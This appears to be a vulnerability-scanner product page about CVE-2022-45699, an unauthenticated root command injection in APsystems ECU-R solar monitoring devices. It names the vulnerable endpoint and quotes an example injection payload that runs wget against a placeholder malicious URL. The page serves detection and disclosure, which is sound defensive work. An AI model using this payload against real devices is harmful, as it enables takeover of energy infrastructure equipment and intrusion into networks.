CVE-2022-45699 Scanner
CVE-2022-45699 Scanner – Detects command injection via timezone parameter in APsystems ECU-R v5203
Short Info
Level
Single Scan
Single Scan
Can be used by
Asset Owner
Estimated Time
10 seconds
Time Interval
8 days 6 hours
Scan only one
Domain, Subdomain, IPv4
Toolbox
-
APsystems ECU-R is an energy monitoring and communication device used in photovoltaic (solar power) systems. It manages and communicates with microinverters to monitor system performance. These devices are typically exposed on local or remote networks for administrative access.
This scanner targets a critical remote command injection vulnerability (CVE-2022-45699) present in ECU-R firmware version 5203. The flaw resides in the administration web interface, specifically the `/index.php/management/set_timezone` endpoint. The `timezone` parameter is improperly sanitized, allowing remote, unauthenticated attackers to inject and execute arbitrary system commands as **root**.
Exploitation involves sending a crafted POST request with a payload injected into the `timezone` field (e.g., `timezone=;wget+malicious-url;#`). This payload is directly interpreted by the system shell, leading to full remote code execution. The scanner confirms exploitation via [interactsh](https://github.com/projectdiscovery/interactsh) integration by checking for out-of-band HTTP interactions.
Successful exploitation can result in full device compromise, including modification of configurations, installation of backdoors, and pivoting within the local network. Because the device is often deployed in critical energy infrastructure, this vulnerability poses a significant security risk.
REFERENCES